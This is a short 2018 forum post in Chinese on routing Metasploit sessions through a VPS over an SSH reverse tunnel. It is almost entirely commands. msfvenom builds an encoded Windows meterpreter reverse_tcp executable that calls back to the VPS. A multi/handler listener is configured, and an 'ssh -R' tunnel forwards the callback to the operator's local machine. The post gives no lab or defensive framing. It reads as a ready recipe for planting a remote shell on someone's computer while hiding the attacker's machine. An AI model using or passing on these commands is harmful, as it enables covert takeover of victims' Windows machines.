anonymou5

 找回密码
 立即注册
搜索
查看: 71|回复: 0

通过VPS SSH隧道使用本地msf

[复制链接]
匿名
匿名  发表于 2018-10-30 11:09:39 |阅读模式
本帖最后由 匿名 于 2018-10-30 11:25 编辑

这里首先需要配置VPS ssh服务
编辑 /etc/ssh/sshd_config
在文件最后添加:
  1. GatewayPorts yes
复制代码
重启ssh服务
之后配置msf客户端:
  1. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[vpsIP] LPORT=8888 -f exe > abc.exe
复制代码
之后本地启用监听:
  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set lhost 192.168.2.100
  5. lhost => 192.168.2.100
  6. msf exploit(handler) > set lport 8888
  7. lport => 8888
  8. msf exploit(handler) > set exitonsession false
  9. exitonsession => false
  10. msf exploit(handler) > exploit -j
  11. [*] Exploit running as background job.

  12. [*] Started reverse TCP handler on 192.168.2.100:8888
复制代码
开启ssh隧道:
  1. ssh -N -R 8888:192.168.2.100:8888 name@remoteserver
复制代码
客户端被执行以后,成功返回回话:


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2018-11-20 19:47 , Processed in 0.091923 second(s), 21 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表